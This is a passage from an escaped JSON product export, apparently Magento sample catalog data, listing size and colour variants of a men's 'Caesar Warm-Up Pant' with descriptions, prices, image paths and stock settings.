Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-32-Black\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"679\":{\"sku\":\"MP01-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-32-Gray\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"680\":{\"sku\":\"MP01-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-32-Purple\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"681\":{\"sku\":\"MP01-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-33-Black\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"682\":{\"sku\":\"MP01-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-33-Gray\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"683\":{\"sku\":\"MP01-33-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-33-Purple\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-33-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Purple\"},\"684\":{\"sku\":\"MP01-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-34-Black\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"685\":{\"sku\":\"MP01-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-34-Gray\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"686\":{\"sku\":\"MP01-34-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Caesar Warm-Up Pant-34-Purple\",\"description\":\"<p>Command your workout and keep your muscles limber in the Caesar Warm-Up Pant. Engineered CoolTech&trade; fabric wicks away moisture so you don\'t have to worry about sweat and discomfort. The drawstring-adjustable waist helps make sure your pants fit properly.<\\/p>\\n<p>&bull; Light gray heather knit straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Inseam: 32\\\". <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; CoolTech&trade; wicking fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"caesar-warm-up-pant-34-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_e